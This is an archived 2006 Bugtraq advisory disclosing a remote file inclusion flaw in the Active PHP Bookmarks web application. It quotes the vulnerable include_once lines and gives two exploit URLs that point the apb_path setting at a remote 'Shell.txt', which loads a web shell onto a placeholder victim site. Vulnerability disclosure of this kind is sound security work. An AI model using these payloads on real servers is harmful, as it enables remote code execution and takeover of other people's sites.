lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <BAY12-F1094BCE8CF39636B574854F5E20@phx.gbl>
Date: Thu, 23 Nov 2006 22:32:58 +0000
From: "philip anselmo" <spoonman500@...mail.com>
To: bugtraq@...urityfocus.com
Subject: Active PHP Bookmarks (apb.php) Remote file include

Title : Active PHP Bookmarks (apb.php) Remote file include
########################################################################
#######

Discovered By :::: ThE-LoRd-Of-CrAcKiNg {MeHdi}

------------------------------------------------------------------------
Sorce Code:
http://lbstone.com/apb/downloads/apb-1.1.02.zip

Affected software description :
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Application : Active PHP Bookmarks
Catégorie :Remote File Include
------------------------------------------------------------------------
-----
Vulnerable Code:
include_once($APB_SETTINGS['apb_path'].'apb_bookmark_class.php'); 
(apb_common.php)
include_once($APB_SETTINGS['apb_path'].'apb_group_class.php'); 
(apb_common.php)
include_once($APB_SETTINGS['apb_path'].'apb_view_class.php'); 
(apb_common.php)

include_once($APB_SETTINGS['apb_path']."apb_common.php"); (apb.php)
----------------------------------------------------------------------
Exploit:
http://www.VicTim.com/[Script_Path]/apb_common.php?APB_SETTINGS['apb_path']=Shell.txt?
http://www.VicTim.com/[Script_Path]/apb.php?APB_SETTINGS['apb_path']=Shell.txt?


------------------------------------------------------------------------
----

greetz: 
Studio36-DeStRoY-ToOoFA-AsbMay-Mr.3freet-Simba-Disco-Faiçeu-YouSSeF-all my 
friends

Special Greeting:AsbMay's Group

channel:www.asb-may.net

contact:spoonman500[at]hotmail[dot]com

_________________________________________________________________
Testez Windows Llive Mail Beta ! 
http://www.msn.fr/newhotmail/Default.asp?Ath=f

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ